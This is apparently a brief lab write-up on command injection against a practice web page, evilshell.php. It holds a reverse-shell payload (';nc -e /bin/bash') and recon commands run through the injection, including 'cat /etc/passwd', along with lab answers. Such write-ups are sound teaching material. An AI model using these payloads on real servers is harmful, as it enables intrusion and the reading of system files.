Command Injection occurs when a server-sidecode (like PHP) in a web application makes a system call to the host machine. Its a web vulnerability that can allow an attacker to use system commands on the server.
;nc -e /bin/bash - a reverse shell that takes advantage of a target system's vulnerabilities to initiate a shell system and access the victim's system.
Blind Command Injection - occurs when the system command made to the server does not return the response to the user in the HTML document.
We can detect Active Command INjection by seeing responses from the system call.
Practical
We are first greeted with the vulnerable website, http://10.10.29.177/evilshell.php.
http://10.10.29.177/evilshell.php
From here, we are able to use various commands to find files and who is on the system. To answer the first question, I used the command "ls" to list all the folders in the current directory.
drpepper.txt
The strange file I found in this case was "drpepper.txt" which when read, reads "I love Dr Pepper".
I love Dr Pepper
To find who the user is, I used the "whoami" command.
whoami
Using "cat /etc/passwd", we are able to analyze the output and see that the user's shell is set at "usr/sbin/nologin".
/usr/sbin/nologin
To find the Ubuntu version, I used the command, "lsb_release -a".
Ubuntu 18.04.4
To find the MOTD, we can use the command, cat /etc/update-motd.d/00-header.
